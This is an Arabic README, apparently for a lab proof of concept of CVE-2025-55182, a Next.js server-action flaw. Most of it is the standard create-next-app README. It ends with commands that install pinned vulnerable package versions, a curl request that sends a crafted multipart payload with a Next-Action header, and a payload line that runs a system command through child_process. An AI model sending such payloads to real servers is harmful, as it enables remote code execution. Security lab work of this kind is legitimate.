
إثبات مفهوم لاستغلال ثغرة CVE-2025-55182 التي تستهدف تزوير طلبات الخادم في Next.js عبر طلبات متعددة الأجزاء مصممة مع التلاعب برأس Next-Action.
هذا هو مشروع Next.js تم تهيئته باستخدام create-next-app.
أولاً، قم بتشغيل خادم التطوير:
npm run dev
# أو
yarn dev
# أو
pnpm dev
# أو
bun dev
افتح http://localhost:3000 في متصفحك لرؤية النتيجة.
يمكنك البدء في تعديل الصفحة عن طريق تعديل app/page.tsx. الصفحة يتم تحديثها تلقائيًا عند تعديل الملف.
يستخدم هذا المشروع next/font لتحسين وتحميل Geist تلقائيًا، وهي عائلة خطوط جديدة لـ Vercel.
لمعرفة المزيد عن Next.js، ألق نظرة على الموارد التالية:
يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحب بها!
أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من منشئي Next.js.
اطلع على توثيق نشر Next.js لمزيد من التفاصيل.
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"